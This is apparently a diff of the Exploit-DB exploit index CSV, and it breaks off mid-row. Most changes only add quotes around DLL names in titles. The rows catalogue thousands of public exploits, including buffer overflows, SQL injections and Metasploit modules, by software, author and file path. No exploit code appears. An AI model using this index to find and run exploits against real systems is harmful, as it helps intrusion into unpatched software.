-22530,platforms/windows/remote/22530.pl,"Microsoft Internet Explorer 5 - Remote URLMON.dll Buffer Overflow",2003-04-23,"Jouko Pynnonen",windows,remote,0 +22530,platforms/windows/remote/22530.pl,"Microsoft Internet Explorer 5 - Remote 'URLMON.dll' Buffer Overflow",2003-04-23,"Jouko Pynnonen",windows,remote,0 22531,platforms/linux/local/22531.pl,"SAP Database 7.3/7.4 - SDBINST Race Condition",2003-04-23,"Larry W. Cashdollar",linux,local,0 22532,platforms/hardware/remote/22532.txt,"IKE - Aggressive Mode Shared Secret Hash Leakage",1999-10-02,"John Pliam",hardware,remote,0 22533,platforms/hardware/remote/22533.txt,"Nokia IPSO 3.4.x - Voyager ReadFile.TCL Remote File Reading",2003-04-24,"Jonas Eriksson",hardware,remote,0 @@ -20018,8 +20018,8 @@ id,file,description,date,author,platform,type,port 22734,platforms/windows/remote/22734.html,"Microsoft Internet Explorer 6 -' %USERPROFILE%' File Execution",2003-06-05,"Eiji James Yoshida",windows,remote,0 22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0 22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass)",2012-11-15,d3b4g,php,webapps,0 -22737,platforms/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - auth.dll pa_modify_accounts() Remote Code Execution",2012-11-15,rgod,windows,remote,0 -22738,platforms/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 - ldapagnt.dll ldapagnt_eval() Perl Code Evaluation Remote Code Execution",2012-11-15,rgod,windows,remote,0 +22737,platforms/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution",2012-11-15,rgod,windows,remote,0 +22738,platforms/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution",2012-11-15,rgod,windows,remote,0 22739,platforms/hardware/dos/22739.py,"Broadcom BCM4325 and BCM4329 Devices - Denial of Service",2012-11-15,CoreLabs,hardware,dos,0 22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0 22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,"cr4wl3r ",php,webapps,0 @@ -20116,7 +20116,7 @@ id,file,description,date,author,platform,type,port 22834,platforms/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (2)",2003-06-24,"Mark Litchfield",windows,remote,0 22835,platforms/windows/local/22835.c,"Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun",2003-06-24,posidron,windows,local,0 22836,platforms/linux/local/22836.pl,"Elm 2.3/2.4 - Local TERM Environment Variable Buffer Overrun",1997-05-13,kokanin,linux,local,0 -22837,platforms/windows/remote/22837.c,"Microsoft Windows 2000/NT 4 Media Services - nsiislog.dll Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 +22837,platforms/windows/remote/22837.c,"Microsoft Windows 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0 22838,platforms/windows/remote/22838.txt,"BRS Webweaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0 22839,platforms/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,linux,dos,0 22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - SUID execve() System Call Race Condition Executable File Read (PoC)",2003-06-26,IhaQueR,linux,local,0 @@ -20393,7 +20393,7 @@ id,file,description,date,author,platform,type,port 23121,platforms/windows/remote/23121.txt,"Kukol E.V. HTTP & FTP Server Suite 6.2 - File Disclosure",2003-09-08,euronymous,windows,remote,0 23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation",2003-09-08,http-equiv,windows,remote,0 23123,platforms/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun",2003-09-08,D4rkGr3y,windows,remote,0 -23124,platforms/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin IN_MIDI.dll Track Data Size Buffer Overflow",2003-09-08,"Luigi Auriemma",windows,dos,0 +23124,platforms/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow",2003-09-08,"Luigi Auriemma",windows,dos,0 23125,platforms/php/webapps/23125.txt,"phpBB 2.0.6 - URL BBCode HTML Injection",2003-09-08,keupon_ps2,php,webapps,0 23126,platforms/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23127,platforms/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Cross-Site Scripting",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 @@ -20407,7 +20407,7 @@ id,file,description,date,author,platform,type,port 23136,platforms/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,multiple,remote,0 23137,platforms/multiple/remote/23137.txt,"Cacheflow CacheOS 4.1.10016 - HTTP HOST Proxy",2003-09-10,"Tim Kennedy",multiple,remote,0 23138,platforms/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow",2003-09-10,"Frank DENIS",linux,dos,0 -23139,platforms/windows/dos/23139.txt,"myServer 0.4.x - cgi-lib.dll Remote Buffer Overflow",2003-09-12,Moran,windows,dos,0 +23139,platforms/windows/dos/23139.txt,"myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow",2003-09-12,Moran,windows,dos,0 23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection",2003-09-12,frog,php,webapps,0 23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass",2003-09-15,Texonet,sco,local,0 23142,platforms/multiple/dos/23142.txt,"WideChapter 3.0 - HTTP Request Buffer Overflow",2003-09-15,"Bahaa Naamneh",multiple,dos,0 @@ -20446,7 +20446,7 @@ id,file,description,date,author,platform,type,port 23174,platforms/multiple/remote/23174.txt,"TCLHttpd 3.4.2 - Multiple Cross-Site Scripting Vulnerabilities",2003-09-24,"Phuong Nguyen",multiple,remote,0 23175,platforms/php/webapps/23175.txt,"yMonda Thread-IT 1.6 - Multiple Fields HTML Injection",2003-09-24,"Bahaa Naamneh",php,webapps,0 23176,platforms/multiple/remote/23176.txt,"NullLogic Null HTTPd 0.5.1 - Error Page Long HTTP Request Cross-Site Scripting",2003-09-24,"Luigi Auriemma",multiple,remote,0 -23177,platforms/windows/dos/23177.txt,"Nvidia Install Application 2.1002.85.551 - (NVI2.dll) Unicode Buffer Overflow (PoC)",2012-12-06,LiquidWorm,windows,dos,0 +23177,platforms/windows/dos/23177.txt,"Nvidia Install Application 2.1002.85.551 - 'NVI2.dll' Unicode Buffer Overflow (PoC)",2012-12-06,LiquidWorm,windows,dos,0 23178,platforms/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 - SOAP Server Arbitrary Script Execution (Metasploit)",2012-12-06,Metasploit,multiple,remote,0 23179,platforms/windows/remote/23179.rb,"Oracle MySQL for Microsoft Windows - MOF Execution (Metasploit)",2012-12-06,Metasploit,windows,remote,0 23180,platforms/php/webapps/23180.txt,"Kordil EDms 2.2.60rc3 - SQL Injection",2012-12-06,"Woody Hughes",php,webapps,0 @@ -20524,7 +20524,7 @@ id,file,description,date,author,platform,type,port 23252,platforms/php/webapps/23252.txt,"Clipbucket 2.6 Revision 738 - Multiple SQL Injections",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23253,platforms/php/webapps/23253.txt,"Achievo 1.4.5 - Multiple Vulnerabilities (2)",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",windows,dos,0 -23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control - User32.dll Function Buffer Overrun",2003-10-15,"Brett Moore",windows,local,0 +23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control - 'User32.dll' Function Buffer Overrun",2003-10-15,"Brett Moore",windows,local,0 23256,platforms/cfm/webapps/23256.txt,"Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting",2003-10-15,"Lorenzo Hernandez Garcia-Hierro",cfm,webapps,0 23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting",2003-10-16,"Oliver Karow",multiple,remote,0 23258,platforms/linux/local/23258.c,"Oracle Database Server 9.0.x - Oracle Binary Local Buffer Overflow",2003-10-17,c0ntex,linux,local,0 @@ -20557,7 +20557,7 @@ id,file,description,date,author,platform,type,port 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0 23286,platforms/php/webapps/23286.txt,"Joomla! Component JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0 -23288,platforms/windows/dos/23288.txt,"Irfanview 4.33 - IMXCF.dll Plugin Code Execution",2012-12-11,beford,windows,dos,0 +23288,platforms/windows/dos/23288.txt,"Irfanview 4.33 - 'IMXCF.dll' Plugin Code Execution",2012-12-11,beford,windows,dos,0 23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - Cross-Site Request Forgery",2012-12-11,sajith,php,webapps,0 23290,platforms/windows/remote/23290.rb,"HP Data Protector - DtbClsLogin Buffer Overflow (Metasploit)",2012-12-11,Metasploit,windows,remote,0 23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums - Multiple Fields HTML Injection",2003-10-30,ProXy,php,webapps,0 @@ -20579,7 +20579,7 @@ id,file,description,date,author,platform,type,port 23306,platforms/linux/remote/23306.c,"thttpd 2.2x - defang Remote Buffer Overflow (2)",2003-10-27,d3ck4,linux,remote,0 23307,platforms/multiple/remote/23307.txt,"Fastream NetFile 6.0.3.588 - Error Message Cross-Site Scripting",2003-10-28,"Oliver Karow",multiple,remote,0 23308,platforms/linux/local/23308.c,"kpopup 0.9.x - Privileged Command Execution",2003-10-28,b0f,linux,local,0 -23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass HTTP Server 7.1 - Directory Disclosure",2003-10-28,"Richard Maudsley",multiple,remote,0 +23309,platforms/multiple/remote/23309.txt,"Centrinity FirstClass HTTP Server 7.1 - Directory Disclosure",2003-10-28,"Richard Maudsley",multiple,remote,0 23310,platforms/windows/dos/23310.pl,"TelCondex SimpleWebserver 2.12.30210 build 3285 - HTTP Referer Remote Buffer Overflow",2003-10-29,"Oliver Karow",windows,dos,0 23311,platforms/php/dos/23311.txt,"E107 - Chatbox.php Denial of Service",2003-10-29,Blademaster,php,dos,0 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 - Input Validation",2003-10-30,"Corsaire Limited",cgi,remote,0 @@ -20769,7 +20769,7 @@ id,file,description,date,author,platform,type,port 23506,platforms/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service",2004-01-02,"Donato Ferrante",windows,dos,0 23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - config_page.php Remote PHP File Inclusion",2004-01-02,tsbeginnervn,php,webapps,0 23508,platforms/hardware/dos/23508.txt,"YaSoft Switch Off 2.3 - Large Packet Remote Denial of Service",2004-01-02,"Peter Winter-Smith",hardware,dos,0 -23509,platforms/windows/remote/23509.c,"YaSoft Switch Off 2.3 - swnet.dll Remote Buffer Overflow",2004-01-02,MrNice,windows,remote,0 +23509,platforms/windows/remote/23509.c,"YaSoft Switch Off 2.3 - 'swnet.dll' Remote Buffer Overflow",2004-01-02,MrNice,windows,remote,0 23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0 23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0 23512,platforms/windows/dos/23512.txt,"Surfnet 1.31 - CMD_CREDITCARD_CHARGE Denial of Service",2004-01-02,Rift_XT,windows,dos,0 @@ -21092,7 +21092,7 @@ id,file,description,date,author,platform,type,port 23843,platforms/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 - Authentication Bypass",2004-03-17,"saudi linux",php,webapps,0 23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 - error.php language Variable Full Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 23845,platforms/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 - error.php Multiple Variables Cross-Site Scripting",2004-03-18,"Janek Vind",php,webapps,0 -23846,platforms/windows/dos/23846.txt,"Symantec Client Firewall Products 5 - SYMNDIS.SYS Driver Remote Denial of Service",2004-03-18,"eEye Digital Security Team",windows,dos,0 +23846,platforms/windows/dos/23846.txt,"Symantec Client Firewall Products 5 - 'SYMNDIS.SYS' Driver Remote Denial of Service",2004-03-18,"eEye Digital Security Team",windows,dos,0 23847,platforms/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,windows,remote,0 23848,platforms/linux/remote/23848.txt,"SquidGuard 1.x - NULL URL Character Unauthorized Access",2004-03-19,"Petko Popadiyski",linux,remote,0 23849,platforms/linux/local/23849.txt,"FVWM 2.4.17/2.5.8 - fvwm_make_browse_menu.sh Scripts Command Execution",2004-03-19,"Dominik Vogt",linux,local,0 @@ -21161,8 +21161,8 @@ id,file,description,date,author,platform,type,port 23914,platforms/cgi/webapps/23914.txt,"FloosieTek FTGate Mail Server 1.2 - Full Path Disclosure",2004-04-06,dr_insane,cgi,webapps,0 23915,platforms/windows/dos/23915.txt,"Adobe Photoshop 8.0 - COM Objects Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23916,platforms/windows/dos/23916.txt,"Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 -23917,platforms/windows/dos/23917.txt,"Panda ActiveScan 5.0 - ascontrol.dll Remote Heap Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 -23918,platforms/windows/dos/23918.txt,"Panda ActiveScan 5.0 - ascontrol.dll Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 +23917,platforms/windows/dos/23917.txt,"Panda ActiveScan 5.0 - 'ascontrol.dll' Remote Heap Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 +23918,platforms/windows/dos/23918.txt,"Panda ActiveScan 5.0 - 'ascontrol.dll' Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23919,platforms/windows/dos/23919.txt,"Symantec Security Check Virus Detection - COM Object Denial of Service",2004-04-07,"Rafel Ivgi The-Insider",windows,dos,0 23920,platforms/windows/dos/23920.txt,"Mcafee FreeScan CoMcFreeScan Browser - Object Buffer Overflow",2004-04-07,"Rafel Ivgi The-Insider",windows,dos,0 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 @@ -21187,7 +21187,7 @@ id,file,description,date,author,platform,type,port 23941,platforms/cgi/webapps/23941.txt,"1st Class Mail Server 4.0 1 - advanced.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps,0 23942,platforms/cgi/webapps/23942.txt,"1st Class Mail Server 4.0 1 - list.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps,0 23943,platforms/linux/dos/23943.txt,"Crackalaka IRC Server 1.0.8 - Remote Denial of Service",2004-04-09,"Donato Ferrante",linux,dos,0 -23944,platforms/windows/dos/23944.php,"Foxit Reader 5.4.4.1128 Firefox Plugin - npFoxitReaderPlugin.dll Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0 +23944,platforms/windows/dos/23944.php,"Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0 23945,platforms/unix/dos/23945.txt,"Ettercap 0.7.5.1 - Stack Overflow",2013-01-07,"Sajjad Pourali",unix,dos,0 23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4 / 2.6 - Sigqueue Blocking Denial of Service",2004-04-12,"Nikita V. Youshchenko",linux,dos,0 23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 - 'tiki-switch_theme.php' theme Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 @@ -21282,7 +21282,7 @@ id,file,description,date,author,platform,type,port 24039,platforms/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 Beta - Database Disclosure",2004-04-22,CyberTal0n,asp,webapps,0 24040,platforms/multiple/remote/24040.txt,"PISG 0.54 - IRC Nick HTML Injection",2004-04-22,shr3kst3r,multiple,remote,0 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite",2004-04-22,"Luigi Auriemma",multiple,remote,0 -24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - YInsthelper.dll Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 +24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - 'YInsthelper.dll' Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read",2004-04-23,"Brad Spengler",linux,local,0 24044,platforms/php/webapps/24044.txt,"PHPLiteAdmin 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps,0 24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,Metasploit,java,remote,0 @@ -21714,7 +21714,7 @@ id,file,description,date,author,platform,type,port 24487,platforms/linux/dos/24487.py,"cURL - Buffer Overflow",2013-02-11,Volema,linux,dos,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - 'index.php id Parameter' SQL Injection",2013-02-17,3spi0n,php,webapps,0 -24490,platforms/windows/remote/24490.rb,"Novell Groupwise Client - gwcls1.dll ActiveX Remote Code Execution (Metasploit)",2013-02-12,Metasploit,windows,remote,0 +24490,platforms/windows/remote/24490.rb,"Novell Groupwise Client - 'gwcls1.dll' ActiveX Remote Code Execution (Metasploit)",2013-02-12,Metasploit,windows,remote,0 24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authentication Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-14,"Scott Bell",windows,remote,0 @@ -22014,7 +22014,7 @@ id,file,description,date,author,platform,type,port 24808,platforms/windows/remote/24808.txt,"Microsoft Internet Explorer 6 - Search Pane URI Obfuscation",2004-12-08,http-equiv,windows,remote,0 24809,platforms/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service",2004-12-08,cesaro,multiple,dos,0 24810,platforms/php/webapps/24810.txt,"PHPGedView 2.x - Descendancy.php Cross-Site Scripting",2004-01-19,JeiAr,php,webapps,0 -24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 - FSMSH.dll CGI Application Installation Full Path Disclosure",2004-12-09,oliver@greyhat.de,windows,remote,0 +24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 - 'FSMSH.dll' CGI Application Installation Full Path Disclosure",2004-12-09,oliver@greyhat.de,windows,remote,0 24814,platforms/php/webapps/24814.txt,"PHPGedView 2.5/2.6 - 'index.php' Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 24815,platforms/linux/dos/24815.txt,"Gamespy Software Development Kit - CD-Key Validation Buffer Overflow",2004-12-10,"Luigi Auriemma",linux,dos,0 24816,platforms/php/webapps/24816.txt,"PHPGedView 2.5/2.6 - Individual.php Cross-Site Scripting",2004-01-12,JeiAr,php,webapps,0 @@ -22084,7 +22084,7 @@ id,file,description,date,author,platform,type,port 24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps,0 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation",2013-03-25,Dr_IDE,windows,local,0 24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Remote",2013-03-25,Dr_IDE,windows,local,0 -24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - (ActUWzd.dll (WzTitle)) Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 +24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' (WzTitle) Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 24887,platforms/windows/remote/24887.rb,"KingView - Log File Parsing Buffer Overflow (Metasploit)",2013-03-25,Metasploit,windows,remote,0 24888,platforms/linux/remote/24888.rb,"Mutiny - Remote Command Execution (Metasploit)",2013-03-25,Metasploit,linux,remote,0 24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center - Arbitrary File Upload (Metasploit)",2013-03-26,Metasploit,windows,remote,0 @@ -22097,7 +22097,7 @@ id,file,description,date,author,platform,type,port 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 24943,platforms/windows/remote/24943.py,"BigAnt Server 2.97 - DDNF 'Username' Buffer Overflow",2013-04-10,"Craig Freyman",windows,remote,0 24955,platforms/linux/remote/24955.rb,"Nagios Remote Plugin Executor - Arbitrary Command Execution (Metasploit)",2013-04-12,Metasploit,linux,remote,5666 -24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - (libav) libavcodec_plugin.dll Denial of Service",2013-04-05,metacom,windows,dos,0 +24917,platforms/windows/dos/24917.py,"Easy DVD Player 3.5.1 - (libav) 'libavcodec_plugin.dll' Denial of Service",2013-04-05,metacom,windows,dos,0 24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0 24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell - Remote PHP Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0 24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,php,remote,0 @@ -22264,7 +22264,7 @@ id,file,description,date,author,platform,type,port 25058,platforms/php/webapps/25058.txt,"Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,php,webapps,0 25059,platforms/php/webapps/25059.txt,"MercuryBoard 1.1 - Multiple Input Validation Vulnerabilities",2005-01-25,"Alberto Trivero",php,webapps,0 25060,platforms/asp/webapps/25060.txt,"Comersus Cart 5.0/6.0 - Multiple Vulnerabilities",2005-01-25,"raf somers",asp,webapps,0 -25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant IN_CDDA.dll Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0 +25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant 'IN_CDDA.dll' Remote Buffer Overflow",2005-01-25,"Yu Yang",windows,dos,0 25062,platforms/php/webapps/25062.txt,"Comdev eCommerce 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-01-25,SmOk3,php,webapps,0 25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service",2005-01-27,MC.Iglo,windows,dos,0 25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 (Build 1112) - 'download.php' Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0 @@ -22340,7 +22340,7 @@ id,file,description,date,author,platform,type,port 25137,platforms/php/remote/25137.rb,"WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)",2013-05-01,Metasploit,php,remote,0 25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 -25140,platforms/windows/dos/25140.txt,"WPS Office - Wpsio.dll Stack Buffer Overflow",2013-05-01,Zhangjiantao,windows,dos,0 +25140,platforms/windows/dos/25140.txt,"WPS Office - 'Wpsio.dll' Stack Buffer Overflow",2013-05-01,Zhangjiantao,windows,dos,0 25141,platforms/windows/local/25141.rb,"AudioCoder 0.8.18 - Buffer Overflow (SEH)",2013-05-02,metacom,windows,local,0 25142,platforms/hardware/webapps/25142.txt,"D-Link DNS-323 - Multiple Vulnerabilities",2013-05-02,sghctoma,hardware,webapps,0 25143,platforms/php/webapps/25143.txt,"Invision Power Board 1.x/2.0.3 - SML Code Script Injection",2005-02-21,"Daniel A.",php,webapps,0 @@ -22552,7 +22552,7 @@ id,file,description,date,author,platform,type,port 25361,platforms/irix/local/25361.txt,"SGI IRIX 6.5.22 - GR_OSView Information Disclosure",2005-04-07,anonymous,irix,local,0 25362,platforms/irix/local/25362.txt,"SGI IRIX 6.5.22 - GR_OSView Local Arbitrary File Overwrite",2005-04-07,anonymous,irix,local,0 25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM 'UNICODE' Overwrite Buffer Overflow (SEH)",2013-05-11,ariarat,windows,dos,0 -25364,platforms/windows/dos/25364.txt,"AN HTTPD - CMDIS.dll Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",windows,dos,0 +25364,platforms/windows/dos/25364.txt,"AN HTTPD - 'CMDIS.dll' Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",windows,dos,0 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",windows,remote,0 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - OP Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 25367,platforms/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 - Module Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 @@ -22605,7 +22605,7 @@ id,file,description,date,author,platform,type,port 25415,platforms/ios/webapps/25415.txt,"Wireless Photo Access 1.0.10 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 25416,platforms/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,hardware,webapps,0 25417,platforms/ios/webapps/25417.txt,"File Lite 3.3 / 3.5 PRO iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 -25418,platforms/windows/dos/25418.py,"MiniWeb HTTP Server (build 300) - Crash (PoC)",2013-05-13,dmnt,windows,dos,0 +25418,platforms/windows/dos/25418.py,"MiniWeb HTTP Server 300 - Crash (PoC)",2013-05-13,dmnt,windows,dos,0 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH)",2013-05-13,seaofglass,windows,local,0 25420,platforms/multiple/remote/25420.txt,"IBM Websphere 5.0/5.1/6.0 - Application Server Web Server Root JSP Source Code Disclosure",2005-04-13,"SPI Labs",multiple,remote,0 25421,platforms/windows/remote/25421.txt,"RSA Security RSA Authentication Agent For Web 5.2 - Cross-Site Scripting",2005-04-15,"Oliver Karow",windows,remote,0 @@ -22857,7 +22857,7 @@ id,file,description,date,author,platform,type,port 25665,platforms/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module - Directory Traversal",2005-05-16,pokley,php,webapps,0 25666,platforms/cgi/webapps/25666.txt,"PServ 3.2 - Source Code Disclosure",2005-05-16,"Claus R. F. Overbeck",cgi,webapps,0 25667,platforms/asp/webapps/25667.txt,"MetaCart E-Shop - ProductsByCategory.asp Cross-Site Scripting",2005-05-16,"Dedi Dwianto",asp,webapps,0 -25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 - Sigmaweb.dll SQL Injection",2005-05-16,"mehran gashtasebi",cgi,webapps,0 +25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 - 'Sigmaweb.dll' SQL Injection",2005-05-16,"mehran gashtasebi",cgi,webapps,0 25669,platforms/linux/remote/25669.txt,"pserv 3.2 - Directory Traversal",2005-05-16,"Claus R. F. Overbeck",linux,remote,0 25670,platforms/multiple/remote/25670.html,"Mozilla Suite And Firefox - 